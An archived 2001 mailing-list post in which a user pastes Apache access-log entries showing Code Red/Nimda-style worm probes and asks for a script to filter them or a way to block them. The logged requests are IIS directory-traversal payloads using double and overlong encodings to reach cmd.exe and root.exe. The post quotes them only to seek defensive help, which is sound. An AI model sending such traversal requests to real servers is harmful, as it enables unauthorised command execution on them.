Cleaning up httpd access logs

Subject: Cleaning up httpd access logs
From: Zeke Runyon (zrunyon@mac.com)
Date: Fri Dec 21 2001 - 18:22:30 MST

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
• Next message: Roger Chrisman: "Re: Book Recommendation"
• Previous message: Zeke Runyon: "Re: Put home directories on second hard drive?"
• Next in thread: Paul J. Lucas: "Re: Cleaning up httpd access logs"

My /var/log/httpd/access_log is cluttered with around 50 hits of strange
code red and other windows virus requests, like:

65.31.216.17 - - [21/Dec/2001:06:11:29 -0500] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 274
65.31.216.17 - - [21/Dec/2001:06:11:30 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
65.31.216.17 - - [21/Dec/2001:06:11:31 -0500] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
65.31.216.17 - - [21/Dec/2001:06:11:32 -0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
65.31.216.17 - - [21/Dec/2001:06:11:35 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315
65.31.216.17 - - [21/Dec/2001:06:11:39 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315
65.31.216.17 - - [21/Dec/2001:06:11:43 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/
system32/cmd.exe?/c+dir HTTP/1.0" 404 331
65.31.216.17 - - [21/Dec/2001:06:11:43 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
65.31.216.17 - - [21/Dec/2001:06:11:44 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
65.31.216.17 - - [21/Dec/2001:06:11:48 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
65.31.216.17 - - [21/Dec/2001:06:11:48 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
65.31.216.17 - - [21/Dec/2001:06:11:49 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
65.31.216.17 - - [21/Dec/2001:06:11:49 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
65.31.216.17 - - [21/Dec/2001:06:11:50 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
65.31.216.17 - - [21/Dec/2001:06:11:51 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
65.31.88.52 - - [21/Dec/2001:06:26:15 -0500] "GET
/scripts/root.exe?/c+dir HTTP/1.0"404 276
65.31.88.52 - - [21/Dec/2001:06:26:18 -0500] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 274
65.31.88.52 - - [21/Dec/2001:06:26:22 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
65.31.88.52 - - [21/Dec/2001:06:26:26 -0500] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
65.31.88.52 - - [21/Dec/2001:06:26:33 -0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
65.31.88.52 - - [21/Dec/2001:06:26:37 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315
65.31.88.52 - - [21/Dec/2001:06:26:40 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315

Do any of you know/have written a good script to filter these out or
know how to prevent the requests from reaching my machine?

                            ##
# Zeke Runyon | zrunyon@mac.com | zekeworld.home.dhs.org
# blog: communistsquirrel.home.dhs.org
# Mac OS X 10.1.1 5M28 | OS 9.2.1 | Yellow Dog Linux 2.1
# Communist squirrels shall rule the world.

• Next message: Roger Chrisman: "Re: Book Recommendation"
• Previous message: Zeke Runyon: "Re: Put home directories on second hard drive?"
• Next in thread: Paul J. Lucas: "Re: Cleaning up httpd access logs"

This archive was generated by hypermail 2a24 : Fri Dec 21 2001 - 18:35:32 MST